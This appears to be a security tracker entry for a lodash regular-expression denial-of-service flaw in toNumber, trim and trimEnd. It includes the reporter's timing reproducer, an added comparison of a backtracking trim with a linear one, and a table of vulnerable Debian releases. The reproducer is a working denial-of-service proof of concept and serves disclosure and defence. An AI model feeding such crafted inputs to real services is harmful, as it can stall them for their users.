Description: All versions of package lodash and all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen):

    var lo = require('lodash');
    // Build "1", followed by n spaces, followed by "1": no leading or
    // trailing whitespace, but a long interior run of spaces.
    function build_blank (n) {
      var ret = "1";
      for (var i = 0; i < n; i++) { ret += " "; }
      return ret + "1";
    }
    var s = build_blank(50000);
    // The timestamp calls were lost in extraction; Date.now() is assumed here.
    var time0 = Date.now(); lo.trim(s); var time_cost0 = Date.now() - time0;
    console.log("time_cost0: " + time_cost0);
    var time1 = Date.now(); lo.toNumber(s); var time_cost1 = Date.now() - time1;
    console.log("time_cost1: " + time_cost1);
    var time2 = Date.now(); lo.trimEnd(s); var time_cost2 = Date.now() - time2;
    console.log("time_cost2: " + time_cost2);
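As an added illustration (not code from the tracker page, the reporter or lodash), the input shape from the reproducer is run through a trim whose trailing anchor backtracks and through a scan-based trim that does linear work; the regex is an assumed illustrative pattern with the ReDoS failure mode, not quoted from lodash's source.

```javascript
// Added example, not code from the tracker page, the reporter or lodash.
// Assumption: reTrim is an illustrative pattern with the ReDoS failure mode
// (a trailing "\s+$" that backtracks), not quoted from lodash's source.
const reTrim = /^\s+|\s+$/g;

// Regex-based trim: on "1" + many spaces + "1", the "\s+$" branch is tried
// from every space, runs to the final "1", fails at "$" and backtracks one
// character at a time, so the work grows quadratically with the space run.
function regexTrim(s) {
  return s.replace(reTrim, '');
}

// One-character test, so the regex engine never scans across the string.
function isSpace(ch) {
  return /\s/.test(ch);
}

// Linear-time trim: step in from each end over whitespace, slice once.
// On the reproducer's input both loops stop at the first character checked.
function scanTrim(s) {
  let start = 0;
  let end = s.length;
  while (start < end && isSpace(s[start])) start++;
  while (end > start && isSpace(s[end - 1])) end--;
  return s.slice(start, end);
}

// Constructed input of the reproducer's shape: "1", n spaces, "1".
function buildBlank(n) {
  return '1' + ' '.repeat(n) + '1';
}

// Milliseconds one trim function spends on buildBlank(n).
function timeTrim(fn, n) {
  const s = buildBlank(n);
  const t0 = Date.now();
  fn(s);
  return Date.now() - t0;
}

// regexTrim's time grows far faster than linearly in n; scanTrim stays flat.
for (const n of [5000, 10000, 20000]) {
  console.log(`n=${n} regexTrim=${timeTrim(regexTrim, n)}ms scanTrim=${timeTrim(scanTrim, n)}ms`);
}
```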
Source: CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues, web search, more)
NVD severity: medium

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package    | Release       | Version                     | Status
node-lodash (PTS) | stretch       | 4.16.6+dfsg-2               | vulnerable
node-lodash (PTS) | bullseye, sid | 4.17.20+dfsg+~cs8.31.172-1  | vulnerable

The information below is based on the following data on fixed versions.

Package | Type | Release | Fixed Version | Urgency | Origin | Debian Bugs
(no fixed versions listed)